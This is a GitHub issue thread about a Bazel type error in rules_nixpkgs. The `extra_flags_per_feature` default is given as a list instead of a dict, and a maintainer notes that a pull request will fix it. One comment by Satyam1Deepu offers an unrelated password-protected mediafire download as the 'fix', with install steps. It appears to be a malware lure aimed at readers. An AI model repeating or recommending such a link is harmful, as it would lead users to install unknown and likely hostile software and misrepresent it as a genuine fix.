### ISSUE TITLE
Default value for `extra_flags_per_feature` CC configuration is invalid

### ISSUE THREAD

**Issue by Silic0nS0ldier** [tweag/rules_nixpkgs#578]
**Describe the bug**
Bazel is expecting a `dict` (`{}`) but is given `list` (`[]`).

**To Reproduce**
Use a Nix CC toolchain in Bazel `7.3.0` or `8.0.0-pre.20240807.1`.

**Expected behavior**
Build passes.

**Environment**
 - OS name + version: GNU/Linux (Ubuntu 22.04)
 - Version of the code: a11818b2173100ab8122712ae3694b711f956cbd

**Additional context**
Issue manifests as
```
RROR: /[...]/external/local_config_cc_nix_x86_64-linux/BUILD.bazel:92:20: @@local_config_cc_nix_x86_64-linux//:local: expected value of type 'dict(string, list(string))' for attribute 'extra_flags_per_feature' in 'cc_toolchain_config' rule, but got [] (list)
ERROR: Evaluation of query "@local_config_cc_nix_x86_64-linux//:local" failed
```

Issue noted on #574, new issue raised as I cannot open the closed issue (and technically there is a value now).

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aherrmann** [comment]
Will be addressed by https://github.com/tweag/rules_nixpkgs/pull/576
